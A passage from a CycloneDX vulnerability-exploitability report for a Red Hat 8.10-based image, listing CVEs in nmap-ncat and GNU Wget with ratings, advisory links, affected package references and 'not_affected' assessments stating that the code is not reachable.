          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libnghttp2@1.33.0-6.el8_10.2?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libnghttp2@1.33.0-6.el8_10.2?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libnghttp2@1.33.0-6.el8_10.2?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libnghttp2@1.33.0-6.el8_10.2?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libnghttp2@1.33.0-6.el8_10.2?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": "Exploitability analysis, additional details:\nTemurin JVM binary is linked only against glibc:\n$ ldd /usr/lib/jvm/temurin-17-jre/bin/java\n        linux-vdso.so.1 (0x0000ffff8cd00000)\n        libjli.so => /usr/lib/jvm/temurin-17-jre/bin/../lib/libjli.so (0x0000ffff8cc70000)\n        libpthread.so.0 => /lib64/libpthread.so.0 (0x0000ffff8cc3b000)\n        libdl.so.2 => /lib64/libdl.so.2 (0x0000ffff8cc1a000)\n        libc.so.6 => /lib64/libc.so.6 (0x0000ffff8caa4000)\n        /lib/ld-linux-aarch64.so.1 (0x0000ffff8ccc2000)"
      }
    },
    {
      "id": "CVE-2026-58058",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        191
      ],
      "description": "Nmap through 7.99 does not keep the IPv6 extension-header walk within the captured packet in ipv6_get_data_primitive (libnetutil/netutil.cc), so the pointer advances past the buffer and the remaining-length computation underflows to a large value. A scanned target or on-path attacker returning a crafted IPv6 response with a truncated extension header can trigger out-of-bounds reads and a crash during raw IPv6 scans.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-58058"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-58058"
        },
        {
          "url": "https://github.com/bikini/exploitarium/tree/main/nmap-ipv6-extlen-wrap-poc"
        },
        {
          "url": "https://github.com/nmap/nmap/commit/bb6754e76bb1686315008e1aa1c40202a513fb83"
        },
        {
          "url": "https://nmap.org/changelog.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-58058"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-58058"
        },
        {
          "url": "https://www.vulncheck.com/advisories/nmap-integer-underflow-in-ipv6-extension-header-parsing"
        }
      ],
      "published": "2026-06-28T02:16:33+00:00",
      "updated": "2026-06-30T17:31:44+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/nmap-ncat@7.92-2.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2",
          "versions": [
            {
              "version": "2:7.92-2.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/nmap-ncat@7.92-2.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/nmap-ncat@7.92-2.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/nmap-ncat@7.92-2.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/nmap-ncat@7.92-2.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/nmap-ncat@7.92-2.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/nmap-ncat@7.92-2.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/nmap-ncat@7.92-2.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/nmap-ncat@7.92-2.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/nmap-ncat@7.92-2.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/nmap-ncat@7.92-2.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/nmap-ncat@7.92-2.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/nmap-ncat@7.92-2.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/nmap-ncat@7.92-2.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/nmap-ncat@7.92-2.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/nmap-ncat@7.92-2.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/nmap-ncat@7.92-2.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/nmap-ncat@7.92-2.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/nmap-ncat@7.92-2.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/nmap-ncat@7.92-2.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-58469",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        125
      ],
      "description": "GNU Wget through 1.25.0, fixed in commit 37a40fc, contains a heap buffer underread vulnerability in the clean_metalink_string() function within src/metalink.c that allows a malicious server to trigger memory corruption by serving a Metalink document containing a whitespace-only URL. Attackers can cause the function to decrement a pointer past the start of the buffer when processing an all-whitespace Metalink URL, potentially leading to abnormal program behavior.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-58469"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-58469"
        },
        {
          "url": "https://github.com/advisories/GHSA-fxf9-rxpj-26gx"
        },
        {
          "url": "https://gitlab.com/gnuwget/wget/-/commit/37a40fcb450153f69537c7cbc2a7a4fb0b6f7826"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-58469"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8543-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-58469"
        },
        {
          "url": "https://www.vulncheck.com/advisories/gnu-wget-heap-buffer-underread-via-metalink-url-parsing"
        }
      ],
      "published": "2026-07-07T21:17:28+00:00",
      "updated": "2026-07-09T15:59:43+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.19.5-12.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-58470",
      "ratings": [
        {
          "source": {
            "name": "julia"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        190
      ],
      "description": "GNU Wget through 1.25.0, fixed in commit 43d3ba9, contains an integer overflow vulnerability in the parse_content_range() function within src/http.c that allows server-controlled values to cause signed integer arithmetic to overflow. Attackers can supply malicious Content-Range header values to trigger undefined behavior and download desynchronization in the affected client.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-58470"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-58470"
        },
        {
          "url": "https://github.com/advisories/GHSA-5f52-px6m-c5hw"
        },
        {
          "url": "https://gitlab.com/gnuwget/wget/-/commit/43d3ba9336bc94937e6fae2365c6ffd30c34ffcf"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-58470"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8543-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-58470"
        },
        {
          "url": "https://www.vulncheck.com/advisories/gnu-wget-integer-overflow-via-content-range-header-parsing"
        }
      ],
      "published": "2026-07-07T21:17:28+00:00",
      "updated": "2026-07-09T16:01:18+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.19.5-12.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-58471",
      "ratings": [
        {
          "source": {
            "name": "julia"
          },
          "score": 7.1,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.1,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        122
      ],
      "description": "GNU Wget through 1.25.0, fixed in commit c2640fe, contains a heap buffer overflow vulnerability in the convert_fname() function within src/url.c that allows remote attackers to trigger memory corruption through a server-supplied filename requiring character set conversion. When the output buffer is too small during iconv E2BIG reallocation, the reallocation logic miscalculates the remaining space, leading to a heap buffer overflow that can be exploited via a maliciously crafted server response.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-58471"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-58471"
        },
        {
          "url": "https://github.com/advisories/GHSA-vv88-699v-w5rh"
        },
        {
          "url": "https://gitlab.com/gnuwget/wget/-/commit/c2640fe5171c59f87c58dc9fcb195b2d18b010ee"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-58471"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8543-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-58471"
        },
        {
          "url": "https://www.vulncheck.com/advisories/gnu-wget-heap-buffer-overflow-via-convert-fname-in-url-c"
        }
      ],
      "published": "2026-07-07T21:17:28+00:00",
      "updated": "2026-07-09T16:02:07+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.19.5-12.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-58472",
      "ratings": [
        {
          "source": {
            "name": "julia"
          },
          "score": 7.1,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.1,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        190
      ],
      "description": "GNU Wget through 1.25.0, fixed in commit dd692d9, contains a heap buffer overflow vulnerability in the html_quote_string() function in src/convert.c that allows a remote attacker to trigger memory corruption by supplying a crafted HTML attribute with a large number of characters requiring entity encoding. A server-supplied HTML attribute causes a signed integer counter to overflow during output size accumulation, resulting in an undersized heap allocation and subsequent heap buffer overflow during the copy phase.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-58472"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-58472"
        },
        {
          "url": "https://github.com/advisories/GHSA-332r-8pmf-8m9p"
        },
        {
          "url": "https://gitlab.com/gnuwget/wget/-/commit/dd692d9cea5335b181d877ae917fe6e75587a812"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-58472"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8543-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-58472"
        },
        {
          "url": "https://www.vulncheck.com/advisories/gnu-wget-heap-buffer-overflow-via-html-attribute-encoding"
        }
      ],
      "published": "2026-07-07T21:17:28+00:00",
      "updated": "2026-07-09T15:58:45+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.19.5-12.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
